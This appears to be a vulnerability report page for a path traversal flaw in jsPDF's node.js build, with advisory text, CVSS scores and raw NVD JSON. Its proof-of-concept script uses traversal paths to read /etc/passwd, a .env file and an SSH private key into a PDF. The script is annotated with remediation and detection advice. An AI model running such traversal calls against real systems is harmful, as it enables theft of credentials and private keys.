Security Vulnerability Report
CVE-2025-68428 CVSS 7.5 HIGH

CVE-2025-68428

Published: 2026-01-05 22:15:52
Last Modified: 2026-01-16 18:34:24

Description

jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are `addImage`, `html`, and `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. The vulnerability has been fixed in jspdf@4.0.0. This version restricts file system access by default. This semver-major update does not introduce other breaking changes. Some workarounds are available. With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. For older node versions, sanitize user-provided paths before passing them to jsPDF.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:* - VULNERABLE
jsPDF < 4.0.0 (node.js builds: dist/jspdf.node.js, dist/jspdf.node.min.js)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
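// Demonstration for CVE-2025-68428 (jsPDF < 4.0.0, node.js builds only).
//
// loadFile() in the affected builds reads whatever path it is handed. The
// paths below are hard-coded literals; in a real application the exposure is
// any request parameter, form field or job argument that reaches loadFile(),
// addImage(), html() or addFont() without validation.
//
// The listing was originally collapsed onto a single line, which turned
// everything after the first `//` into a comment. Line breaks are restored
// here so that the statements are actual code again.
const { jsPDF } = require('jspdf');

// Create a jsPDF instance.
const doc = new jsPDF();

// Path traversal: attempt to read /etc/passwd.
// NOTE(review): the return value of loadFile() is discarded in every attempt
// below, so each "Successfully read" message only shows that the call did not
// throw. It does not prove that any content was returned.
try {
  doc.loadFile('../../../../etc/passwd');
  console.log('Successfully read /etc/passwd');
} catch (error) {
  console.error('Error:', error.message);
}

// Attempt to read an application configuration file.
try {
  doc.loadFile('../../../../app/config/.env');
  console.log('Successfully read .env file');
} catch (error) {
  console.error('Error:', error.message);
}

// Attempt to read an SSH private key.
try {
  doc.loadFile('../../../../home/user/.ssh/id_rsa');
  console.log('Successfully read SSH private key');
} catch (error) {
  console.error('Error:', error.message);
}

// Save the PDF that is meant to contain the file contents.
doc.save('exfiltrated_data.pdf');

// Remediation, per the advisory text on this page:
//   1. Upgrade to jsPDF 4.0.0 or later, which restricts file system access by
//      default.
//   2. On Node.js versions where the permission model is stable
//      (v22.13.0 / v23.5.0 / v24.0.0 and later), run the process with
//      `--permission` and grant read access only to the directories the
//      application needs, for example via `--allow-fs-read`.
//   3. On older Node.js versions, validate user-supplied paths before they
//      reach jsPDF: resolve the path against a fixed base directory and
//      reject anything that resolves outside it.
//
// Passing a relative path literal such as './allowed-directory/safe-file.pdf'
// (as the original trailing comment suggested) is not a fix in itself. The
// safety comes from the path never being attacker-controlled, or from one of
// the controls above.
//
// Detection: look for `../` sequences (raw or URL-encoded) in inputs that feed
// PDF generation, and for the node process opening files outside the
// application directory.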

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68428", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:51.977", "lastModified": "2026-01-16T18:34:24.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are `addImage`, `html`, and `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. The vulnerability has been fixed in [email protected]. This version restricts file system access per default. This semver-major update does not introduce other breaking changes. Some workarounds areavailable. With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. 
For older node versions, sanitize user-provided paths before passing them to jsPDF."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", 
"confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-35"}, {"lang": "en", "value": "CWE-73"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:parall:jspdf:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.0.0", "matchCriteriaId": "1EED4B66-0CA7-43D9-A73B-505062F90B4D"}]}]}], "references": [{"url": "https://github.com/parallax/jsPDF/commit/a688c8f479929b24a6543b1fa2d6364abb03066d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/parallax/jsPDF/releases/tag/v4.0.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}